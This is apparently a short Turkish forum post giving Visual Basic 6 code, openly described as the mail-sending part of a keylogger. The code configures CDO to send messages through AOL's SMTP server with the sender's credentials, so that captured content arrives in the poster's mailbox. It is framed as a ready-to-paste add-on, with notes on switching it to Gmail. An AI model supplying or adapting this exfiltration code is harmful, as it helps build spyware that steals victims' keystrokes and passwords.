al sana keyloggerin için mail atma kodu
command ekle ve koduna bunu ekle
not:kırmızı yerleri düzenlemeyi unutma ayrıca aol mail de işe yarar
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
schema = "http://schemas.microsoft.com/cdo/configuration/"
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.aol.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") =
"kullanıcı adın"
Flds.Item(schema & "sendpassword") =
"şifren"
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg
.To =
"kullanıcıadı[email protected]"
.From =
"kullanıcıadı[email protected]"
.Sender =
"kullanıcıadı[email protected]"
.ReplyTo =
"kullanıcıadı[email protected]"
.Subject =
"konu"
.HTMLBody =
"mesajınız" 'buraya yazılanlar sana mesaj olarak maile gelir
.Organization = "Mr. Kozmon"
Set .Configuration = iConf
SendEmailGmail = .Send
End With
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing
ufak bi düzenlemeyle gmailede msj atabilirsin bu kodla visual basic 6 içindir bu kodlar